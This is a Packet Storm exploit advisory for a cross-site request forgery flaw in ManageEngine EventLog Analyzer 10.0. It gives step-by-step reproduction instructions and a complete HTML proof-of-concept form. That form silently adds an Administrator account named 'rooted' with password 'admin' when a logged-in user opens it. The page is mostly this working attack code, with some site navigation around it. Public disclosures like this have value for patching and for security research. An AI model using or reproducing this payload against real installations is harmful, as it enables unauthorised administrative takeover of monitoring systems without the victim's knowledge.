what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine EventLog Analyzer 10.0 CSRF

ManageEngine EventLog Analyzer 10.0 CSRF
Posted May 18, 2015
Authored by Akash S. Chavan

ManageEngine EventLog Analyzer version 10.0 build 10001 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 17c40b02db45425f3f5e9dc51696a724713566db259e3ec17a2530445625a7dd

ManageEngine EventLog Analyzer 10.0 CSRF

Change Mirror Download
=========================================================================================
CSRF Vulnerability in ManageEngine EventLog Analyzer Version :10.0, Build Number : 10001
=========================================================================================


. contents:: Table Of Content

Overview
========

* Title : ManageEngine EventLog Analyzer Version 10.0 Cross Site Request Forgery
* Author: Akash S. Chavan
* Product Homepage: https://www.manageengine.com/products/eventlog/
* Severity: HIGH
* Version Affected: Version 10.0, Build Number: 10001 and mostly prior to it
* Version Tested : Version 10.0 Build Number: 10001
* version patched:


About Vulnerability
===================
This products is vulnerable to a CSRF attack meaning that the attacker can perform any action without user's knowledge.

Vulnerability Class
===================
Cross Site Request Forgery (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29)

Steps to Reproduce: (POC)
=========================

After installing the plugin

1. Logon into the application.
2. Create the HTML file containing the below PoC code.
3. Edit userName parameter with the name of the user you wish to add.
4. After editing open the same HTML file in browser, there will be a Click me Button.
5. Click the button.
6. Now goto to first tab and hit F5 to refresh.
7. You should see the new user. with the name given by us.

CSRF POC Code
=============

<html>
<body>
<form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
<input type="hidden" name="domainId" value="" />
<input type="hidden" name="roleId" value="" />
<input type="hidden" name="addField" value="true" />
<input type="hidden" name="userType" value="Administrator" />
<input type="hidden" name="userName" value="rooted" />
<input type="hidden" name="pwd1" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="userGroup" value="Administrator" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="AddSubmit" value="Add User" />
<input type="hidden" name="alpha" value="" />
<input type="hidden" name="userIds" value="" />
<input type="hidden" name="roleName" value="" />
<input type="hidden" name="selDevices" value="" />
<input type="hidden" name="doAction" value="" />
<input type="hidden" name="productName" value="eventlog" />
<input type="hidden" name="licType" value="Prem" />
<input type="hidden" name="next" value="" />
<input type="hidden" name="currentUserId" value="1" />
<input type="hidden" name="isAdminServer" value="false" />
<input type="submit" value="Click Me" />
</form>
</body>
</html>

credits
=======
* Akash S. Chavan
* Information Security Testing
* ControlCase International Pvt Ltd.
* akashchavan0708 (at) gmail (dot) com
* https://twitter.com/r00t3dd
* https://in.linkedin.com/in/r00t3d
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close